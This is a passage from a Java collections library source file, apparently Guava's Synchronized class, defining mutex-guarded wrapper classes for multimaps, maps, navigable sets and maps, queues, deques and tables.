if (entrySet == null) {
entrySet = typePreservingSet(delegate().entrySet(), mutex);
}
return entrySet;
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> Multimap<K, V> multimap(
Multimap<K, V> multimap, @CheckForNull Object mutex) {
if (multimap instanceof SynchronizedMultimap || multimap instanceof BaseImmutableMultimap) {
return multimap;
}
return new SynchronizedMultimap<>(multimap, mutex);
}
static class SynchronizedMultimap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedObject implements Multimap<K, V> {
@CheckForNull transient Set<K> keySet;
@CheckForNull transient Collection<V> valuesCollection;
@CheckForNull transient Collection<Map.Entry<K, V>> entries;
@CheckForNull transient Map<K, Collection<V>> asMap;
@CheckForNull transient Multiset<K> keys;
@SuppressWarnings("unchecked")
@Override
Multimap<K, V> delegate() {
return (Multimap<K, V>) super.delegate();
}
SynchronizedMultimap(Multimap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
public int size() {
synchronized (mutex) {
return delegate().size();
}
}
@Override
public boolean isEmpty() {
synchronized (mutex) {
return delegate().isEmpty();
}
}
@Override
public boolean containsKey(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().containsKey(key);
}
}
@Override
public boolean containsValue(@CheckForNull Object value) {
synchronized (mutex) {
return delegate().containsValue(value);
}
}
@Override
public boolean containsEntry(@CheckForNull Object key, @CheckForNull Object value) {
synchronized (mutex) {
return delegate().containsEntry(key, value);
}
}
@Override
public Collection<V> get(@ParametricNullness K key) {
synchronized (mutex) {
return typePreservingCollection(delegate().get(key), mutex);
}
}
@Override
public boolean put(@ParametricNullness K key, @ParametricNullness V value) {
synchronized (mutex) {
return delegate().put(key, value);
}
}
@Override
public boolean putAll(@ParametricNullness K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().putAll(key, values);
}
}
@Override
public boolean putAll(Multimap<? extends K, ? extends V> multimap) {
synchronized (mutex) {
return delegate().putAll(multimap);
}
}
@Override
public Collection<V> replaceValues(@ParametricNullness K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().replaceValues(key, values); // copy not synchronized
}
}
@Override
public boolean remove(@CheckForNull Object key, @CheckForNull Object value) {
synchronized (mutex) {
return delegate().remove(key, value);
}
}
@Override
public Collection<V> removeAll(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().removeAll(key); // copy not synchronized
}
}
@Override
public void clear() {
synchronized (mutex) {
delegate().clear();
}
}
@Override
public Set<K> keySet() {
synchronized (mutex) {
if (keySet == null) {
keySet = typePreservingSet(delegate().keySet(), mutex);
}
return keySet;
}
}
@Override
public Collection<V> values() {
synchronized (mutex) {
if (valuesCollection == null) {
valuesCollection = collection(delegate().values(), mutex);
}
return valuesCollection;
}
}
@Override
public Collection<Map.Entry<K, V>> entries() {
synchronized (mutex) {
if (entries == null) {
entries = typePreservingCollection(delegate().entries(), mutex);
}
return entries;
}
}
@Override
public Map<K, Collection<V>> asMap() {
synchronized (mutex) {
if (asMap == null) {
asMap = new SynchronizedAsMap<>(delegate().asMap(), mutex);
}
return asMap;
}
}
@Override
public Multiset<K> keys() {
synchronized (mutex) {
if (keys == null) {
keys = multiset(delegate().keys(), mutex);
}
return keys;
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> ListMultimap<K, V> listMultimap(
ListMultimap<K, V> multimap, @CheckForNull Object mutex) {
if (multimap instanceof SynchronizedListMultimap || multimap instanceof BaseImmutableMultimap) {
return multimap;
}
return new SynchronizedListMultimap<>(multimap, mutex);
}
static final class SynchronizedListMultimap<
K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMultimap<K, V> implements ListMultimap<K, V> {
SynchronizedListMultimap(ListMultimap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
ListMultimap<K, V> delegate() {
return (ListMultimap<K, V>) super.delegate();
}
@Override
public List<V> get(K key) {
synchronized (mutex) {
return list(delegate().get(key), mutex);
}
}
@Override
public List<V> removeAll(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().removeAll(key); // copy not synchronized
}
}
@Override
public List<V> replaceValues(K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().replaceValues(key, values); // copy not synchronized
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> SetMultimap<K, V> setMultimap(
SetMultimap<K, V> multimap, @CheckForNull Object mutex) {
if (multimap instanceof SynchronizedSetMultimap || multimap instanceof BaseImmutableMultimap) {
return multimap;
}
return new SynchronizedSetMultimap<>(multimap, mutex);
}
static class SynchronizedSetMultimap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMultimap<K, V> implements SetMultimap<K, V> {
@CheckForNull transient Set<Map.Entry<K, V>> entrySet;
SynchronizedSetMultimap(SetMultimap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
SetMultimap<K, V> delegate() {
return (SetMultimap<K, V>) super.delegate();
}
@Override
public Set<V> get(K key) {
synchronized (mutex) {
return set(delegate().get(key), mutex);
}
}
@Override
public Set<V> removeAll(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().removeAll(key); // copy not synchronized
}
}
@Override
public Set<V> replaceValues(K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().replaceValues(key, values); // copy not synchronized
}
}
@Override
public Set<Map.Entry<K, V>> entries() {
synchronized (mutex) {
if (entrySet == null) {
entrySet = set(delegate().entries(), mutex);
}
return entrySet;
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object>
SortedSetMultimap<K, V> sortedSetMultimap(
SortedSetMultimap<K, V> multimap, @CheckForNull Object mutex) {
if (multimap instanceof SynchronizedSortedSetMultimap) {
return multimap;
}
return new SynchronizedSortedSetMultimap<>(multimap, mutex);
}
static final class SynchronizedSortedSetMultimap<
K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedSetMultimap<K, V> implements SortedSetMultimap<K, V> {
SynchronizedSortedSetMultimap(SortedSetMultimap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
SortedSetMultimap<K, V> delegate() {
return (SortedSetMultimap<K, V>) super.delegate();
}
@Override
public SortedSet<V> get(K key) {
synchronized (mutex) {
return sortedSet(delegate().get(key), mutex);
}
}
@Override
public SortedSet<V> removeAll(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().removeAll(key); // copy not synchronized
}
}
@Override
public SortedSet<V> replaceValues(K key, Iterable<? extends V> values) {
synchronized (mutex) {
return delegate().replaceValues(key, values); // copy not synchronized
}
}
@Override
@CheckForNull
public Comparator<? super V> valueComparator() {
synchronized (mutex) {
return delegate().valueComparator();
}
}
private static final long serialVersionUID = 0;
}
private static <E extends @Nullable Object> Collection<E> typePreservingCollection(
Collection<E> collection, @CheckForNull Object mutex) {
if (collection instanceof SortedSet) {
return sortedSet((SortedSet<E>) collection, mutex);
}
if (collection instanceof Set) {
return set((Set<E>) collection, mutex);
}
if (collection instanceof List) {
return list((List<E>) collection, mutex);
}
return collection(collection, mutex);
}
private static <E extends @Nullable Object> Set<E> typePreservingSet(
Set<E> set, @CheckForNull Object mutex) {
if (set instanceof SortedSet) {
return sortedSet((SortedSet<E>) set, mutex);
} else {
return set(set, mutex);
}
}
static final class SynchronizedAsMapEntries<
K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedSet<Map.Entry<K, Collection<V>>> {
SynchronizedAsMapEntries(
Set<Map.Entry<K, Collection<V>>> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
public Iterator<Map.Entry<K, Collection<V>>> iterator() {
// Must be manually synchronized.
return new TransformedIterator<Map.Entry<K, Collection<V>>, Map.Entry<K, Collection<V>>>(
super.iterator()) {
@Override
Map.Entry<K, Collection<V>> transform(final Map.Entry<K, Collection<V>> entry) {
return new ForwardingMapEntry<K, Collection<V>>() {
@Override
protected Map.Entry<K, Collection<V>> delegate() {
return entry;
}
@Override
public Collection<V> getValue() {
return typePreservingCollection(entry.getValue(), mutex);
}
};
}
};
}
// See Collections.CheckedMap.CheckedEntrySet for details on attacks.
@Override
public @Nullable Object[] toArray() {
synchronized (mutex) {
/*
* toArrayImpl returns `@Nullable Object[]` rather than `Object[]` but only because it can
* be used with collections that may contain null. This collection never contains nulls, so
* we could return `Object[]`. But this class is private and J2KT cannot change return types
* in overrides, so we declare `@Nullable Object[]` as the return type.
*/
return ObjectArrays.toArrayImpl(delegate());
}
}
@Override
@SuppressWarnings("nullness") // b/192354773 in our checker affects toArray declarations
public <T extends @Nullable Object> T[] toArray(T[] array) {
synchronized (mutex) {
return ObjectArrays.toArrayImpl(delegate(), array);
}
}
@Override
public boolean contains(@CheckForNull Object o) {
synchronized (mutex) {
return Maps.containsEntryImpl(delegate(), o);
}
}
@Override
public boolean containsAll(Collection<?> c) {
synchronized (mutex) {
return Collections2.containsAllImpl(delegate(), c);
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return Sets.equalsImpl(delegate(), o);
}
}
@Override
public boolean remove(@CheckForNull Object o) {
synchronized (mutex) {
return Maps.removeEntryImpl(delegate(), o);
}
}
@Override
public boolean removeAll(Collection<?> c) {
synchronized (mutex) {
return Iterators.removeAll(delegate().iterator(), c);
}
}
@Override
public boolean retainAll(Collection<?> c) {
synchronized (mutex) {
return Iterators.retainAll(delegate().iterator(), c);
}
}
private static final long serialVersionUID = 0;
}
@VisibleForTesting
static <K extends @Nullable Object, V extends @Nullable Object> Map<K, V> map(
Map<K, V> map, @CheckForNull Object mutex) {
return new SynchronizedMap<>(map, mutex);
}
static class SynchronizedMap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedObject implements Map<K, V> {
@CheckForNull transient Set<K> keySet;
@CheckForNull transient Collection<V> values;
@CheckForNull transient Set<Map.Entry<K, V>> entrySet;
SynchronizedMap(Map<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@SuppressWarnings("unchecked")
@Override
Map<K, V> delegate() {
return (Map<K, V>) super.delegate();
}
@Override
public void clear() {
synchronized (mutex) {
delegate().clear();
}
}
@Override
public boolean containsKey(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().containsKey(key);
}
}
@Override
public boolean containsValue(@CheckForNull Object value) {
synchronized (mutex) {
return delegate().containsValue(value);
}
}
@Override
public Set<Map.Entry<K, V>> entrySet() {
synchronized (mutex) {
if (entrySet == null) {
entrySet = set(delegate().entrySet(), mutex);
}
return entrySet;
}
}
@Override
@CheckForNull
public V get(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().get(key);
}
}
@Override
public boolean isEmpty() {
synchronized (mutex) {
return delegate().isEmpty();
}
}
@Override
public Set<K> keySet() {
synchronized (mutex) {
if (keySet == null) {
keySet = set(delegate().keySet(), mutex);
}
return keySet;
}
}
@Override
@CheckForNull
public V put(K key, V value) {
synchronized (mutex) {
return delegate().put(key, value);
}
}
@Override
public void putAll(Map<? extends K, ? extends V> map) {
synchronized (mutex) {
delegate().putAll(map);
}
}
@Override
@CheckForNull
public V remove(@CheckForNull Object key) {
synchronized (mutex) {
return delegate().remove(key);
}
}
@Override
public int size() {
synchronized (mutex) {
return delegate().size();
}
}
@Override
public Collection<V> values() {
synchronized (mutex) {
if (values == null) {
values = collection(delegate().values(), mutex);
}
return values;
}
}
@Override
public boolean equals(@CheckForNull Object o) {
if (o == this) {
return true;
}
synchronized (mutex) {
return delegate().equals(o);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> SortedMap<K, V> sortedMap(
SortedMap<K, V> sortedMap, @CheckForNull Object mutex) {
return new SynchronizedSortedMap<>(sortedMap, mutex);
}
static class SynchronizedSortedMap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMap<K, V> implements SortedMap<K, V> {
SynchronizedSortedMap(SortedMap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
SortedMap<K, V> delegate() {
return (SortedMap<K, V>) super.delegate();
}
@Override
@CheckForNull
public Comparator<? super K> comparator() {
synchronized (mutex) {
return delegate().comparator();
}
}
@Override
public K firstKey() {
synchronized (mutex) {
return delegate().firstKey();
}
}
@Override
public SortedMap<K, V> headMap(K toKey) {
synchronized (mutex) {
return sortedMap(delegate().headMap(toKey), mutex);
}
}
@Override
public K lastKey() {
synchronized (mutex) {
return delegate().lastKey();
}
}
@Override
public SortedMap<K, V> subMap(K fromKey, K toKey) {
synchronized (mutex) {
return sortedMap(delegate().subMap(fromKey, toKey), mutex);
}
}
@Override
public SortedMap<K, V> tailMap(K fromKey) {
synchronized (mutex) {
return sortedMap(delegate().tailMap(fromKey), mutex);
}
}
private static final long serialVersionUID = 0;
}
static <K extends @Nullable Object, V extends @Nullable Object> BiMap<K, V> biMap(
BiMap<K, V> bimap, @CheckForNull Object mutex) {
if (bimap instanceof SynchronizedBiMap || bimap instanceof ImmutableBiMap) {
return bimap;
}
return new SynchronizedBiMap<>(bimap, mutex, null);
}
static final class SynchronizedBiMap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMap<K, V> implements BiMap<K, V>, Serializable {
@CheckForNull private transient Set<V> valueSet;
@RetainedWith @CheckForNull private transient BiMap<V, K> inverse;
private SynchronizedBiMap(
BiMap<K, V> delegate, @CheckForNull Object mutex, @CheckForNull BiMap<V, K> inverse) {
super(delegate, mutex);
this.inverse = inverse;
}
@Override
BiMap<K, V> delegate() {
return (BiMap<K, V>) super.delegate();
}
@Override
public Set<V> values() {
synchronized (mutex) {
if (valueSet == null) {
valueSet = set(delegate().values(), mutex);
}
return valueSet;
}
}
@Override
@CheckForNull
public V forcePut(@ParametricNullness K key, @ParametricNullness V value) {
synchronized (mutex) {
return delegate().forcePut(key, value);
}
}
@Override
public BiMap<V, K> inverse() {
synchronized (mutex) {
if (inverse == null) {
inverse = new SynchronizedBiMap<>(delegate().inverse(), mutex, this);
}
return inverse;
}
}
private static final long serialVersionUID = 0;
}
static final class SynchronizedAsMap<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedMap<K, Collection<V>> {
@CheckForNull transient Set<Map.Entry<K, Collection<V>>> asMapEntrySet;
@CheckForNull transient Collection<Collection<V>> asMapValues;
SynchronizedAsMap(Map<K, Collection<V>> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
@CheckForNull
public Collection<V> get(@CheckForNull Object key) {
synchronized (mutex) {
Collection<V> collection = super.get(key);
return (collection == null) ? null : typePreservingCollection(collection, mutex);
}
}
@Override
public Set<Map.Entry<K, Collection<V>>> entrySet() {
synchronized (mutex) {
if (asMapEntrySet == null) {
asMapEntrySet = new SynchronizedAsMapEntries<>(delegate().entrySet(), mutex);
}
return asMapEntrySet;
}
}
@Override
public Collection<Collection<V>> values() {
synchronized (mutex) {
if (asMapValues == null) {
asMapValues = new SynchronizedAsMapValues<V>(delegate().values(), mutex);
}
return asMapValues;
}
}
@Override
public boolean containsValue(@CheckForNull Object o) {
// values() and its contains() method are both synchronized.
return values().contains(o);
}
private static final long serialVersionUID = 0;
}
static final class SynchronizedAsMapValues<V extends @Nullable Object>
extends SynchronizedCollection<Collection<V>> {
SynchronizedAsMapValues(Collection<Collection<V>> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
public Iterator<Collection<V>> iterator() {
// Must be manually synchronized.
return new TransformedIterator<Collection<V>, Collection<V>>(super.iterator()) {
@Override
Collection<V> transform(Collection<V> from) {
return typePreservingCollection(from, mutex);
}
};
}
private static final long serialVersionUID = 0;
}
@GwtIncompatible // NavigableSet
@VisibleForTesting
static final class SynchronizedNavigableSet<E extends @Nullable Object>
extends SynchronizedSortedSet<E> implements NavigableSet<E> {
SynchronizedNavigableSet(NavigableSet<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
NavigableSet<E> delegate() {
return (NavigableSet<E>) super.delegate();
}
@Override
@CheckForNull
public E ceiling(E e) {
synchronized (mutex) {
return delegate().ceiling(e);
}
}
@Override
public Iterator<E> descendingIterator() {
return delegate().descendingIterator(); // manually synchronized
}
@CheckForNull transient NavigableSet<E> descendingSet;
@Override
public NavigableSet<E> descendingSet() {
synchronized (mutex) {
if (descendingSet == null) {
NavigableSet<E> dS = Synchronized.navigableSet(delegate().descendingSet(), mutex);
descendingSet = dS;
return dS;
}
return descendingSet;
}
}
@Override
@CheckForNull
public E floor(E e) {
synchronized (mutex) {
return delegate().floor(e);
}
}
@Override
public NavigableSet<E> headSet(E toElement, boolean inclusive) {
synchronized (mutex) {
return Synchronized.navigableSet(delegate().headSet(toElement, inclusive), mutex);
}
}
@Override
public SortedSet<E> headSet(E toElement) {
return headSet(toElement, false);
}
@Override
@CheckForNull
public E higher(E e) {
synchronized (mutex) {
return delegate().higher(e);
}
}
@Override
@CheckForNull
public E lower(E e) {
synchronized (mutex) {
return delegate().lower(e);
}
}
@Override
@CheckForNull
public E pollFirst() {
synchronized (mutex) {
return delegate().pollFirst();
}
}
@Override
@CheckForNull
public E pollLast() {
synchronized (mutex) {
return delegate().pollLast();
}
}
@Override
public NavigableSet<E> subSet(
E fromElement, boolean fromInclusive, E toElement, boolean toInclusive) {
synchronized (mutex) {
return Synchronized.navigableSet(
delegate().subSet(fromElement, fromInclusive, toElement, toInclusive), mutex);
}
}
@Override
public SortedSet<E> subSet(E fromElement, E toElement) {
return subSet(fromElement, true, toElement, false);
}
@Override
public NavigableSet<E> tailSet(E fromElement, boolean inclusive) {
synchronized (mutex) {
return Synchronized.navigableSet(delegate().tailSet(fromElement, inclusive), mutex);
}
}
@Override
public SortedSet<E> tailSet(E fromElement) {
return tailSet(fromElement, true);
}
private static final long serialVersionUID = 0;
}
@GwtIncompatible // NavigableSet
static <E extends @Nullable Object> NavigableSet<E> navigableSet(
NavigableSet<E> navigableSet, @CheckForNull Object mutex) {
return new SynchronizedNavigableSet<>(navigableSet, mutex);
}
@GwtIncompatible // NavigableSet
static <E extends @Nullable Object> NavigableSet<E> navigableSet(NavigableSet<E> navigableSet) {
return navigableSet(navigableSet, null);
}
@GwtIncompatible // NavigableMap
static <K extends @Nullable Object, V extends @Nullable Object> NavigableMap<K, V> navigableMap(
NavigableMap<K, V> navigableMap) {
return navigableMap(navigableMap, null);
}
@GwtIncompatible // NavigableMap
static <K extends @Nullable Object, V extends @Nullable Object> NavigableMap<K, V> navigableMap(
NavigableMap<K, V> navigableMap, @CheckForNull Object mutex) {
return new SynchronizedNavigableMap<>(navigableMap, mutex);
}
@GwtIncompatible // NavigableMap
@VisibleForTesting
static final class SynchronizedNavigableMap<
K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedSortedMap<K, V> implements NavigableMap<K, V> {
SynchronizedNavigableMap(NavigableMap<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
NavigableMap<K, V> delegate() {
return (NavigableMap<K, V>) super.delegate();
}
@Override
@CheckForNull
public Map.Entry<K, V> ceilingEntry(K key) {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().ceilingEntry(key), mutex);
}
}
@Override
@CheckForNull
public K ceilingKey(K key) {
synchronized (mutex) {
return delegate().ceilingKey(key);
}
}
@CheckForNull transient NavigableSet<K> descendingKeySet;
@Override
public NavigableSet<K> descendingKeySet() {
synchronized (mutex) {
if (descendingKeySet == null) {
return descendingKeySet = Synchronized.navigableSet(delegate().descendingKeySet(), mutex);
}
return descendingKeySet;
}
}
@CheckForNull transient NavigableMap<K, V> descendingMap;
@Override
public NavigableMap<K, V> descendingMap() {
synchronized (mutex) {
if (descendingMap == null) {
return descendingMap = navigableMap(delegate().descendingMap(), mutex);
}
return descendingMap;
}
}
@Override
@CheckForNull
public Map.Entry<K, V> firstEntry() {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().firstEntry(), mutex);
}
}
@Override
@CheckForNull
public Map.Entry<K, V> floorEntry(K key) {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().floorEntry(key), mutex);
}
}
@Override
@CheckForNull
public K floorKey(K key) {
synchronized (mutex) {
return delegate().floorKey(key);
}
}
@Override
public NavigableMap<K, V> headMap(K toKey, boolean inclusive) {
synchronized (mutex) {
return navigableMap(delegate().headMap(toKey, inclusive), mutex);
}
}
@Override
public SortedMap<K, V> headMap(K toKey) {
return headMap(toKey, false);
}
@Override
@CheckForNull
public Map.Entry<K, V> higherEntry(K key) {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().higherEntry(key), mutex);
}
}
@Override
@CheckForNull
public K higherKey(K key) {
synchronized (mutex) {
return delegate().higherKey(key);
}
}
@Override
@CheckForNull
public Map.Entry<K, V> lastEntry() {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().lastEntry(), mutex);
}
}
@Override
@CheckForNull
public Map.Entry<K, V> lowerEntry(K key) {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().lowerEntry(key), mutex);
}
}
@Override
@CheckForNull
public K lowerKey(K key) {
synchronized (mutex) {
return delegate().lowerKey(key);
}
}
@Override
public Set<K> keySet() {
return navigableKeySet();
}
@CheckForNull transient NavigableSet<K> navigableKeySet;
@Override
public NavigableSet<K> navigableKeySet() {
synchronized (mutex) {
if (navigableKeySet == null) {
return navigableKeySet = Synchronized.navigableSet(delegate().navigableKeySet(), mutex);
}
return navigableKeySet;
}
}
@Override
@CheckForNull
public Map.Entry<K, V> pollFirstEntry() {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().pollFirstEntry(), mutex);
}
}
@Override
@CheckForNull
public Map.Entry<K, V> pollLastEntry() {
synchronized (mutex) {
return nullableSynchronizedEntry(delegate().pollLastEntry(), mutex);
}
}
@Override
public NavigableMap<K, V> subMap(
K fromKey, boolean fromInclusive, K toKey, boolean toInclusive) {
synchronized (mutex) {
return navigableMap(delegate().subMap(fromKey, fromInclusive, toKey, toInclusive), mutex);
}
}
@Override
public SortedMap<K, V> subMap(K fromKey, K toKey) {
return subMap(fromKey, true, toKey, false);
}
@Override
public NavigableMap<K, V> tailMap(K fromKey, boolean inclusive) {
synchronized (mutex) {
return navigableMap(delegate().tailMap(fromKey, inclusive), mutex);
}
}
@Override
public SortedMap<K, V> tailMap(K fromKey) {
return tailMap(fromKey, true);
}
private static final long serialVersionUID = 0;
}
@GwtIncompatible // works but is needed only for NavigableMap
@CheckForNull
private static <K extends @Nullable Object, V extends @Nullable Object>
Map.Entry<K, V> nullableSynchronizedEntry(
@CheckForNull Map.Entry<K, V> entry, @CheckForNull Object mutex) {
if (entry == null) {
return null;
}
return new SynchronizedEntry<>(entry, mutex);
}
@GwtIncompatible // works but is needed only for NavigableMap
static final class SynchronizedEntry<K extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedObject implements Map.Entry<K, V> {
SynchronizedEntry(Map.Entry<K, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@SuppressWarnings("unchecked") // guaranteed by the constructor
@Override
Map.Entry<K, V> delegate() {
return (Map.Entry<K, V>) super.delegate();
}
@Override
public boolean equals(@CheckForNull Object obj) {
synchronized (mutex) {
return delegate().equals(obj);
}
}
@Override
public int hashCode() {
synchronized (mutex) {
return delegate().hashCode();
}
}
@Override
public K getKey() {
synchronized (mutex) {
return delegate().getKey();
}
}
@Override
public V getValue() {
synchronized (mutex) {
return delegate().getValue();
}
}
@Override
public V setValue(V value) {
synchronized (mutex) {
return delegate().setValue(value);
}
}
private static final long serialVersionUID = 0;
}
static <E extends @Nullable Object> Queue<E> queue(Queue<E> queue, @CheckForNull Object mutex) {
return (queue instanceof SynchronizedQueue) ? queue : new SynchronizedQueue<E>(queue, mutex);
}
static class SynchronizedQueue<E extends @Nullable Object> extends SynchronizedCollection<E>
implements Queue<E> {
SynchronizedQueue(Queue<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
Queue<E> delegate() {
return (Queue<E>) super.delegate();
}
@Override
public E element() {
synchronized (mutex) {
return delegate().element();
}
}
@Override
public boolean offer(E e) {
synchronized (mutex) {
return delegate().offer(e);
}
}
@Override
@CheckForNull
public E peek() {
synchronized (mutex) {
return delegate().peek();
}
}
@Override
@CheckForNull
public E poll() {
synchronized (mutex) {
return delegate().poll();
}
}
@Override
public E remove() {
synchronized (mutex) {
return delegate().remove();
}
}
private static final long serialVersionUID = 0;
}
static <E extends @Nullable Object> Deque<E> deque(Deque<E> deque, @CheckForNull Object mutex) {
return new SynchronizedDeque<>(deque, mutex);
}
static final class SynchronizedDeque<E extends @Nullable Object> extends SynchronizedQueue<E>
implements Deque<E> {
SynchronizedDeque(Deque<E> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@Override
Deque<E> delegate() {
return (Deque<E>) super.delegate();
}
@Override
public void addFirst(E e) {
synchronized (mutex) {
delegate().addFirst(e);
}
}
@Override
public void addLast(E e) {
synchronized (mutex) {
delegate().addLast(e);
}
}
@Override
public boolean offerFirst(E e) {
synchronized (mutex) {
return delegate().offerFirst(e);
}
}
@Override
public boolean offerLast(E e) {
synchronized (mutex) {
return delegate().offerLast(e);
}
}
@Override
public E removeFirst() {
synchronized (mutex) {
return delegate().removeFirst();
}
}
@Override
public E removeLast() {
synchronized (mutex) {
return delegate().removeLast();
}
}
@Override
@CheckForNull
public E pollFirst() {
synchronized (mutex) {
return delegate().pollFirst();
}
}
@Override
@CheckForNull
public E pollLast() {
synchronized (mutex) {
return delegate().pollLast();
}
}
@Override
public E getFirst() {
synchronized (mutex) {
return delegate().getFirst();
}
}
@Override
public E getLast() {
synchronized (mutex) {
return delegate().getLast();
}
}
@Override
@CheckForNull
public E peekFirst() {
synchronized (mutex) {
return delegate().peekFirst();
}
}
@Override
@CheckForNull
public E peekLast() {
synchronized (mutex) {
return delegate().peekLast();
}
}
@Override
public boolean removeFirstOccurrence(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().removeFirstOccurrence(o);
}
}
@Override
public boolean removeLastOccurrence(@CheckForNull Object o) {
synchronized (mutex) {
return delegate().removeLastOccurrence(o);
}
}
@Override
public void push(E e) {
synchronized (mutex) {
delegate().push(e);
}
}
@Override
public E pop() {
synchronized (mutex) {
return delegate().pop();
}
}
@Override
public Iterator<E> descendingIterator() {
synchronized (mutex) {
return delegate().descendingIterator();
}
}
private static final long serialVersionUID = 0;
}
static <R extends @Nullable Object, C extends @Nullable Object, V extends @Nullable Object>
Table<R, C, V> table(Table<R, C, V> table, @CheckForNull Object mutex) {
return new SynchronizedTable<>(table, mutex);
}
static final class SynchronizedTable<
R extends @Nullable Object, C extends @Nullable Object, V extends @Nullable Object>
extends SynchronizedObject implements Table<R, C, V> {
SynchronizedTable(Table<R, C, V> delegate, @CheckForNull Object mutex) {
super(delegate, mutex);
}
@SuppressWarnings("unchecked")
@Override
Table<R, C, V> delegate() {
return (Table<R, C, V>) super.delegate();
}
@Override
public boolean contains(@CheckForNull Object rowKey, @CheckForNull Object columnKey) {
synchronized (mutex) {
return delegate().contains(rowKey, columnKey);
}
}
@Override
public boolean containsRow(@CheckForNull Object rowKey) {
synchronized (mutex) {
return delegate().containsRow(rowKey);
}
}
@Override
public boolean containsColumn(@CheckForNull Object columnKey) {
synchronized (mutex) {
return delegate().containsColumn(columnKey);
}
}
@Override
public boolean containsValue(@CheckForNull Object value) {
synchronized (mutex) {
return delegate().containsValue(value);
}
}
@Override
@CheckForNull
public V get(@CheckForNull Object rowKey, @CheckForNull Object columnKey) {
synchronized (mutex) {
return delegate().get(rowKey, columnKey);
}
}
@Override
public boolean isEmpty() {
synchronized (mutex) {
return delegate().isEmpty();
}
}
@Override
public int size() {
synchronized (mutex) {
return delegate().size();
}
}
@Override
public void clear() {
synchronized (mutex) {
delegate().clear();
}
}
@Override
@CheckForNull
public V put(
@ParametricNullness R rowKey,
@ParametricNullness C columnKey,
@ParametricNullness V value) {
synchronized (mutex) {
return delegate().put(rowKey, columnKey, value);
}
}
@Override
public void putAll(Table<? extends R, ? extends C, ? extends V> table) {
synchronized (mutex) {
delegate().putAll(table);
}
}
@Override
@CheckForNull
public V remove(@CheckForNull Object rowKey, @CheckForNull Object columnKey) {
synchronized (mutex) {
return delegate().remove(rowKey, columnKey);
}
}
@Override
public Map<C, V> row(@ParametricNullness R rowKey) {
synchronized (mutex) {
return map(delegate().row(rowKey), mutex);
}
}
@Override
public Map<R, V> column(@ParametricNullness C columnKey) {
synchronized (mutex) {
return map(delegate().column(columnKey), mutex);
}
}
@Override
public Set<Cell<R, C, V>> cellSet() {
synchronized (mutex) {
return set(delegate().cellSet(), mutex);
}
}
@Override
public Set<R> rowKeySet() {
synchronized (mutex) {
return set(delegate().rowKeySet(), mutex);
}
}
@Override
public Set<C> columnKeySet() {
synchronized (mutex) {
return set(delegate().columnKeySet(), mutex);
}
}
@Override
public Collection<V> values() {
synchronized (mutex) {
return collection(delegate().values(), mutex);
}
}
@Override
public Map<R, Map<C, V>> rowMap() {
synchronized (mutex) {
return map(
Maps.transformValues(
delegate().rowMap(),
new com.google.common.base.Function<Map<C, V>, Map<C, V>>() {
@Override
public Map<C, V> apply(Map<C, V> t) {
return map(t, mutex);
}
}),
mutex);
}
}
@Override
public Map<C, Map<R, V>> columnMap() {
